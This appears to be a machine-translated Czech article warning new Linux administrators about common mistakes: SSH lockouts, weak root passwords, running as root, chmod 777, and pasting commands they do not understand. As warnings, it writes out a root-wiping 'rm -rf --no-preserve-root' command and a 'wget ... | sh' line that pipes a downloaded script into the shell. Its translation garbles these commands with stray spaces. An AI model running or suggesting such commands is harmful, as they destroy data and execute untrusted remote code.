Phenquestions
Příkazový řádek Linuxu dává administrátorům serveru kontrolu nad jejich servery a daty na nich uloženými, ale nezabírá jim spouštění destruktivních příkazů s důsledky, které nelze vrátit zpět. Náhodné smazání dat je jen jedním typem chyby, které dělají noví administrátoři serveru.
Zamykání klíčů uvnitř
Správci serverů se připojují k serverům pomocí SSH, služby, která obvykle běží na portu 22 a poskytuje přihlašovací prostředí, pomocí kterého mohou ověření uživatelé spouštět příkazy na vzdálených serverech. Standardní krok posílení zabezpečení je konfigurace SSH tak, aby přijímala připojení na jiném portu. Přesun SSH na náhodný port s vysokým číslem omezuje dopad útoků hrubou silou; hackeři se nemohou pokusit o škodlivé přihlášení, když nemohou najít port, na kterém poslouchá SSH.
Správce, který nakonfiguruje SSH tak, aby naslouchal na jiném portu a poté restartoval server SSH, však může zjistit, že jsou zablokováni nejen hackeři. Pokud firewall serveru není také překonfigurován tak, aby umožňoval připojení na novém portu, pokusy o připojení se nikdy nedostanou na server SSH. Správce bude uzamčen ze svého serveru bez možnosti řešení problému, kromě otevření lístku podpory u svého poskytovatele hostingu. Pokud změníte port SSH, nezapomeňte otevřít nový port v konfiguraci brány firewall vašeho serveru.
Výběr snadno uhodlného hesla
Útoky hrubou silou jsou hádací hrou. Útočník vyzkouší mnoho uživatelských jmen a hesel, dokud nenarazí na kombinaci, která jim umožňuje přístup. Slovníkový útok je propracovanější přístup, který využívá seznamy hesel, často vyřazených z databází uniklých hesel. Útoky na účet root jsou jednodušší než na jiné účty, protože útočník již zná uživatelské jméno. Pokud má účet root jednoduché heslo, může být hacknut v žádném okamžiku.
Existují tři způsoby obrany proti útokům hrubou silou a slovníku proti účtu root.
- Vyberte si dlouhé a složité heslo. Jednoduchá hesla se snadno prolomí; dlouhá a složitá hesla jsou nemožná.
- Nakonfigurujte SSH tak, aby zakazovalo přihlášení root. Toto je jednoduchá změna konfigurace, ale ujistěte se, že je „sudo“ nakonfigurováno tak, aby váš účet mohl zvýšit svá oprávnění.
- Místo hesel použijte autentizaci založenou na klíčích. Přihlášení na základě certifikátu zcela odstraní riziko útoků hrubou silou.
Kopírování příkazů, kterým nerozumíte
Stack Exchange, Server Fault a podobné weby jsou životním prostředím pro nové správce systému Linux, ale měli byste se vyhnout pokušení zkopírovat a vložit příkaz prostředí, kterému nerozumíte. Jaký je rozdíl mezi těmito dvěma příkazy?
sudo rm -rf --no-preserve-root / mnt / mydrive /sudo rm -rf --no-preserve-root / mnt / mydrive /
Je snadné vidět, když se zobrazují společně, ale není to tak snadné, když procházíte fóry a hledáte příkaz k odstranění obsahu připojeného svazku. První příkaz odstraní všechny soubory na připojené jednotce. Druhý příkaz tyto soubory odstraní a vše v kořenovém souborovém systému serveru. Jediným rozdílem je prostor před posledním lomítkem.
Správci serveru se mohou setkat s dlouhými příkazy s kanály, o kterých se říká, že dělají jednu věc, ale dělají něco jiného úplně. Buďte obzvláště opatrní při příkazech, které stahují kód z internetu.
wget http: // příklad.com / verybadscript -O - | sh -Tento příkaz používá wget ke stažení skriptu, který je směrován do shellu a spuštěn. Chcete-li to bezpečně spustit, musíte pochopit, co příkaz dělá, a také to, co dělá stažený skript, včetně kódu, který si stažený skript může sám stáhnout.
Přihlašování jako root
Zatímco běžní uživatelé mohou měnit soubory pouze ve své domovské složce, je málo, co uživatel root na serveru Linux nemůže udělat. Může spouštět jakýkoli software, číst data a mazat jakýkoli soubor.
Aplikace spuštěné uživatelem root mají podobnou sílu. Je výhodné být přihlášen jako uživatel root, protože nemusíte neustále „sudo“ nebo „su“, ale je to nebezpečné. Překlep by mohl zničit váš server během několika sekund. Buggy software spuštěný uživatelem root by mohl způsobit katastrofu. Pro každodenní operace se přihlaste jako běžný uživatel a povýšte oprávnění uživatele root pouze v případě potřeby.
Neučím se oprávnění souborového systému
Oprávnění k souborovému systému mohou být pro nové uživatele systému Linux matoucí a frustrující. Řetězec oprávnění jako „drwxr-xr-x“ vypadá zpočátku nesmyslně a oprávnění vám mohou zabránit v úpravách souborů a zastavit software v tom, co chcete.
Správci systému rychle zjistí, že chmod 777 je kouzelné zaklínadlo, které opravuje většinu těchto problémů, ale je to hrozný nápad. Umožňuje všem, kteří mají účet, soubor číst, zapisovat a spouštět. Pokud tento příkaz spustíte v adresáři webového serveru, žádáte o hackerství. Oprávnění k souborům v systému Linux vypadají komplikovaně, ale pokud se na několik minut dozvíte, jak fungují, objevíte logický a flexibilní systém pro řízení přístupu k souborům.
V éře, která si váží jednoduchých uživatelských zkušeností se všemi ostatními faktory, zůstává příkazový řádek Linuxu rozhodně složitý a odolný vůči zjednodušení. Nemůžeš se vrhnout a doufat, že to bude v pořádku. Nebude to v pořádku a skončíte s katastrofou na rukou.
Ale pokud se naučíte základy - oprávnění k souborům, nástroje příkazového řádku a jejich možnosti, osvědčené postupy zabezpečení - můžete se stát mistrem jedné z nejsilnějších výpočetních platforem, jaké kdy byly vytvořeny.
